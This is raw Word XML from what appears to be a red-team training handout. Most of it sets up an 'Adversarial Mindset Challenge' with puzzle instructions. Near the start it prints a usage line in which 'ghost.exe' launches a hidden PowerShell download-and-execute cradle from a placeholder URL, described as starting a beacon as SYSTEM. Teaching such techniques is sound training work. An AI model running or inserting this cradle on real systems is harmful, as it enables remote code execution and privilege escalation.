          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00643413">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Usage:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A0C1B7" w14:textId="77777777" w:rsidR="00643413" w:rsidRPr="00643413" w:rsidRDefault="00643413" w:rsidP="00643413">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00643413">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
        </w:rPr>
        <w:t>ghost.exe powershell.exe -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00643413">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
        </w:rPr>
        <w:t>nop</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00643413">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
        </w:rPr>
        <w:t xml:space="preserve"> -w hidden -c "IEX ((new-object </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00643413">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
        </w:rPr>
        <w:t>net.webclient</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00643413">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00643413">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
        </w:rPr>
        <w:t>downloadstring</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00643413">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
        </w:rPr>
        <w:t>('http://&lt; TARGETURL &gt;'))"</w:t>
      </w:r>
      <w:r w:rsidRPr="00643413">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="16346BDD" w14:textId="77777777" w:rsidR="00643413" w:rsidRPr="00643413" w:rsidRDefault="00643413" w:rsidP="00643413">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00643413">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>Powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00643413">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t xml:space="preserve"> uses download and execute via encoded </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00643413">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>command</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="741AC3B7" w14:textId="77777777" w:rsidR="00643413" w:rsidRPr="00643413" w:rsidRDefault="00643413" w:rsidP="00643413">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00643413">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t xml:space="preserve">Encoded command starts a new beacon as </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00643413">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>SYSTEM</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2A2D9064" w14:textId="77777777" w:rsidR="00643413" w:rsidRPr="00643413" w:rsidRDefault="00643413" w:rsidP="00643413">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="080DBAE4" w14:textId="77777777" w:rsidR="00643413" w:rsidRDefault="00643413" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="-1276"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="444D23AF" w14:textId="77777777" w:rsidR="00214945" w:rsidRPr="00214945" w:rsidRDefault="00214945" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="-1276"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="219B1024" w14:textId="77777777" w:rsidR="00214945" w:rsidRPr="00214945" w:rsidRDefault="00214945" w:rsidP="00214945">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:caps/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:caps/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>ADVERSARIAL MINDSET CHALLENGE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C70420" w14:textId="02FE7BB6" w:rsidR="00214945" w:rsidRPr="00214945" w:rsidRDefault="00214945" w:rsidP="00214945">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:noProof/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2A0BB6DF" wp14:editId="03A2435A">
            <wp:extent cx="5731510" cy="1707515"/>
            <wp:effectExtent l="0" t="0" r="254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731510" cy="1707515"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F631AA" w14:textId="77777777" w:rsidR="00214945" w:rsidRPr="00214945" w:rsidRDefault="00214945" w:rsidP="00214945">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>DESCRIPTION</w:t>
      </w:r>
      <w:hyperlink r:id="rId133" w:anchor="description" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00214945">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0CDC3222" w14:textId="77777777" w:rsidR="00214945" w:rsidRPr="00214945" w:rsidRDefault="00214945" w:rsidP="00214945">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>In the exercise, you’ll quickly complete a series of puzzle challenges designed to encourage critical thinking in a short time frame.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="767C0110" w14:textId="77777777" w:rsidR="00214945" w:rsidRPr="00214945" w:rsidRDefault="00214945" w:rsidP="00214945">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>INSTRUCTIONS</w:t>
      </w:r>
      <w:hyperlink r:id="rId134" w:anchor="instructions" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00214945">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0E41C44B" w14:textId="77777777" w:rsidR="00214945" w:rsidRPr="00214945" w:rsidRDefault="00214945" w:rsidP="00214945">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="100"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Complete the puzzles in 5 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>minutes</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0C141FEE" w14:textId="77777777" w:rsidR="00214945" w:rsidRPr="00214945" w:rsidRDefault="00214945" w:rsidP="00214945">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="100"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Follow each puzzle’s </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>instructions</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7B19A727" w14:textId="77777777" w:rsidR="00214945" w:rsidRPr="00214945" w:rsidRDefault="00214945" w:rsidP="00214945">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="100"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Begin when </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ready</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="222E7E21" w14:textId="77777777" w:rsidR="00214945" w:rsidRPr="00214945" w:rsidRDefault="00214945" w:rsidP="00214945">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:pict w14:anchorId="1E735B49">
          <v:rect id="_x0000_i1111" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hrnoshade="t" o:hr="t" fillcolor="#1c1e21" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA96E4F" w14:textId="77777777" w:rsidR="00214945" w:rsidRPr="00214945" w:rsidRDefault="00214945" w:rsidP="00214945">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t xml:space="preserve">!! Stop </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>Here !!</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="3AF9C0FD" w14:textId="77777777" w:rsidR="00214945" w:rsidRPr="00214945" w:rsidRDefault="00214945" w:rsidP="00214945">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t xml:space="preserve">Do not continue until </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>ready</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1A6D8028" w14:textId="7CB1E1BB" w:rsidR="00214945" w:rsidRPr="00214945" w:rsidRDefault="00214945" w:rsidP="00214945">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="75DA34A0" w14:textId="77777777" w:rsidR="00214945" w:rsidRPr="00214945" w:rsidRDefault="00214945" w:rsidP="00214945">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:pict w14:anchorId="4A81C3EE">
          <v:rect id="_x0000_i1112" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hrnoshade="t" o:hr="t" fillcolor="#1c1e21" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F21E3DF" w14:textId="77777777" w:rsidR="00214945" w:rsidRPr="00214945" w:rsidRDefault="00214945" w:rsidP="00214945">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>START OF PUZZLES</w:t>
      </w:r>
      <w:hyperlink r:id="rId135" w:anchor="start-of-puzzles" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00214945">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="622FC4B1" w14:textId="77777777" w:rsidR="00214945" w:rsidRPr="00214945" w:rsidRDefault="00214945" w:rsidP="00214945">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:pict w14:anchorId="6F465514">
          <v:rect id="_x0000_i1113" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hrnoshade="t" o:hr="t" fillcolor="#1c1e21" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D999C9B" w14:textId="77777777" w:rsidR="00214945" w:rsidRPr="00214945" w:rsidRDefault="00214945" w:rsidP="00214945">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:caps/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>9 DOT PUZZLE</w:t>
      </w:r>
      <w:hyperlink r:id="rId136" w:anchor="9-dot-puzzle" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00214945">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6919CC22" w14:textId="77777777" w:rsidR="00214945" w:rsidRPr="00214945" w:rsidRDefault="00214945" w:rsidP="00214945">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>Instructions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB92EC9" w14:textId="77777777" w:rsidR="00214945" w:rsidRPr="00214945" w:rsidRDefault="00214945" w:rsidP="00214945">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>Placing your pen on the page only once, draw four straight lines that pass through all nine dots without lifting the pen from the page.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6444A737" w14:textId="42686DF6" w:rsidR="00214945" w:rsidRPr="00214945" w:rsidRDefault="00214945" w:rsidP="00214945">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:noProof/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="783AD560" wp14:editId="1DE304E4">
            <wp:extent cx="5731510" cy="57315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38CFCCC9" w14:textId="77777777" w:rsidR="00214945" w:rsidRPr="00214945" w:rsidRDefault="00214945" w:rsidP="00214945">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F012C3" w14:textId="77777777" w:rsidR="00214945" w:rsidRPr="00214945" w:rsidRDefault="00214945" w:rsidP="00214945">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:pict w14:anchorId="0418C07C">
          <v:rect id="_x0000_i1115" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hrnoshade="t" o:hr="t" fillcolor="#1c1e21" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="130C9138" w14:textId="77777777" w:rsidR="00214945" w:rsidRPr="00214945" w:rsidRDefault="00214945" w:rsidP="00214945">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:caps/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>MAZE CHALLENGE</w:t>
      </w:r>
      <w:hyperlink r:id="rId138" w:anchor="maze-challenge" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00214945">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="642BC4AB" w14:textId="77777777" w:rsidR="00214945" w:rsidRPr="00214945" w:rsidRDefault="00214945" w:rsidP="00214945">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>Instructions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E24BE37" w14:textId="77777777" w:rsidR="00214945" w:rsidRPr="00214945" w:rsidRDefault="00214945" w:rsidP="00214945">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
